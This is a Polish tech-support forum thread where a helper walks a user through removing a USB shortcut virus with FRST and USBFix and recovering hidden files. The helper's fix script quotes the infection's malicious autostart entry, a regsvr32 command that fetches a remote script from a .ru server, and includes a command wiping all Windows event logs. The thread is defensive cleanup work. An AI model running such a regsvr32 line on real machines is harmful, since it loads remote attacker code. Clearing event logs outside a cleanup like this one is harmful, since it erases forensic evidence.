Arscon Opublikowano 2 Kwietnia 2018 Zgłoś Udostępnij Opublikowano 2 Kwietnia 2018 Witam,mam dośc popularny problem, chodzi o to, że podłączyłem pendrive, mam na nim pliki, klikam na pena, otwiera mi się i jest tam skrót i nazwa pendrive, klikne w to i wyskakuje mi komunikat wystapil blad podczas uruchamiania pliku.Nie chce aby przepadły jakieś dane,Ps. zrobiłem jeszcze jedna rzecz, ściągnąłem usbfix i kliknąłem deletion, zrestartowało system, otwieram teraz pendrive ale jest folder bez nazwy i nic tam nie ma.Panowie mam problem z dodaniem logów w załączniku, jak dodaje to zacina się przeglądarka. Dodaje w takim razie na wklej.Jedna tylko prośba to aby nie ruszać moozilli bo mam tam ważne dane.Log z opcji po wciśnięciu deletion w usbfix: http://wklej.org/id/3399481/Addition frst: http://wklej.org/id/3399487/Frst: http://wklej.org/id/3399488/Shortcut: http://wklej.org/id/3399489/Dziękuje bardzo za pomoc Odnośnik do komentarza
Miszel03 Opublikowano 4 Kwietnia 2018 Zgłoś Udostępnij Opublikowano 4 Kwietnia 2018 Posty dot. prośby o raporty stąd kasuję, gdyż te zostały poprawnie dostarczone. Ps. zrobiłem jeszcze jedna rzecz, ściągnąłem usbfix i kliknąłem deletion, zrestartowało system, otwieram teraz pendrive ale jest folder bez nazwy i nic tam nie ma. Infekcja utworzyła folder symulujący jakoby nie miały nazwy i to jedyne co aktualnie pokazuje na tym dysku log USBFix: [13/03/2018 -13:01:08 | D ] E:\ [03/04/2018 - 00:01:36 | RASHD ] E:\Autorun.inf (to szczepionka od USBFix) Ten szkodnik przenosi do tego folderu poprawne dane z pendrive (on powinien być ukryty, ale pewnie USBFix zdjął atrybuty).Twoje pliki w tym folderze mogą się znajdować, tylko Ty ich po prostu nie widzisz - są ukryte pod atrybutem HS. Prześwietlę ten folder w skrypcie i zobaczę czy coś tam jest. Jeżeli będą tam dane to ściągnę atrybuty i powinieneś je zobaczyć.Jeśli jednak danych nie będzie, nic więcej nie da się zrobić. Jedna tylko prośba to aby nie ruszać moozilli bo mam tam ważne dane. Komentarz w spoilerze. Z Tutorial FRST: Dyrektywa EmptyTemp:Opróżnia następujące katalogi: Windows Temp Foldery Temp użytkowników Cache, magazyny HTML5, Cookies i Historia Edge, IE, FF, Chrome i Opera (wyjątek: Historia FF nie jest usuwana) Cache ostatnio otwieranych plików Cache Flash Player Cache Java Cache HTML Steam Cache ikon oraz miniatur Windows Explorer Kolejka transferu BITS (pliki qmgr*.dat) Kosz Jeśli więc takie czyszczenie naruszy Twoje dane to proszę wykasować ją ze skryptu (ostatnia linijka). W systemie aktywna infekcja uruchamiana przez autostart (ale nie jestem w stanie określić konkretnej nazwy). Oprócz tego zajmuję się kasacją martwych wpisów / skrótów / resztek po oprogramowaniu (m.in po produktach Google). Przeprowadź następujące działania (omawiany pendrive musi być podpięty do portu USB w czasie wykonywania skryptu): 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść:CloseProcesses:CreateRestorePoint:C:\Users\KOREK\Desktop\Dokumenty\Gry\Hearthstone.lnkC:\Users\KOREK\Desktop\Dokumenty\Gry\ipla.lnkC:\Users\KOREK\Desktop\Dokumenty\Gry\iTunes.lnkC:\Users\KOREK\Desktop\Dokumenty\Gry\Origin.lnkC:\Users\KOREK\Desktop\Dokumenty\Gry\RollerCoaster Tycoon 3.lnkC:\Users\KOREK\Desktop\Dokumenty\Gry\µTorrent.lnkC:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\to\Elf\Skrót do loader.lnkC:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elfik\Skrót do loader.lnkC:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elf\Skrót do loader.lnkHKLM-x32\...\RunOnce: [] => [X]HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0HKLM\...\Policies\Explorer: [HideSCAHealth] 0HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [TaskbarNoNotification] 0HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [HideSCAHealth] 0HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\MountPoints2: {b41bcb9f-634f-11e7-a5ad-c018850ed8ce} - E:\AutoRun.exeGroupPolicy: Ograniczenia FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku]FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku]C:\Program Files (x86)\GoogleC:\Users\KOREK\AppData\Local\GoogleDeleteKey: HKCU\Software\GoogleDeleteKey: HKLM\SOFTWARE\GoogleDeleteKey: HKLM\SOFTWARE\Wow6432Node\GoogleVirusTotal: C:\Windows\System32\scrobj.dllFolder: E:\Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
Arscon Opublikowano 4 Kwietnia 2018 Autor Zgłoś Udostępnij Opublikowano 4 Kwietnia 2018 (edytowane) Log z fix z frst: http://wklej.org/id/3400592/ log z frst po skanowaniu frst: http://wklej.org/id/3400599/ addition: http://wklej.org/id/3400601/ raport z malware, jakies dwa zagrozenia byly tylko, nic nie robilem: http://wklej.org/id/3400602/ Oczywiscie to wszystko bylo z podpietym pendrivem Edytowane 7 Kwietnia 2018 przez Rucek Odnośnik do komentarza
Miszel03 Opublikowano 5 Kwietnia 2018 Zgłoś Udostępnij Opublikowano 5 Kwietnia 2018 Nie ma za bardzo co odkrywać na tym pendrive. Jeśli chodzi o te pliki / lokalizacje: 2018-04-03 12:14 - 2018-04-02 23:37 - 000302989 ____A [ED1D83917FC0D34CF27879BC506E2A60] () E:\ \Do wydruku\form_ods_nowy.pdf 2018-04-04 11:23 - 2018-04-04 10:48 - 000090678 ____A [7B7222E95B9E0879D4625C6BF80AB12A] () E:\do wydruku\17964780237.pdf2018-04-03 12:15 - 2018-04-03 12:15 - 000000000 ____D [00000000000000000000000000000000] () E:\do wydruku to powinieneś je widzieć. Przekopiuj teraz bezpiecznie na pulpit folder E:\do wydruku i E:\ \Do wydruku\form_ods_nowy.pdf i sformatuj pendrive (wymazania całej zawartości). Jeśli będę dodatkowe pytania / wątpliwości - zadaj je w pierwszej kolejności. Te drobne detekcje adware (skan Malwarebytes) w przeglądarce Mozilla FireFox możesz zadać do kasacji (czyli wykonaj ponownie skan i zaznacz akcje Usuń). Reszta wygląda już w porządku, wszystko zostało pomyślnie wykonane. Odnośnik do komentarza
Arscon Opublikowano 5 Kwietnia 2018 Autor Zgłoś Udostępnij Opublikowano 5 Kwietnia 2018 a ten wirus czy to coś co tworzyło na pendrivie skrót i w ogóle to już tego pozbyłem się z komputera? tego wirusu? Odnośnik do komentarza
Miszel03 Opublikowano 6 Kwietnia 2018 Zgłoś Udostępnij Opublikowano 6 Kwietnia 2018 Tak, system wygląda na wolny od złośliwego oprogramowania. Czy możemy przejść do finalizacji tematu? Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się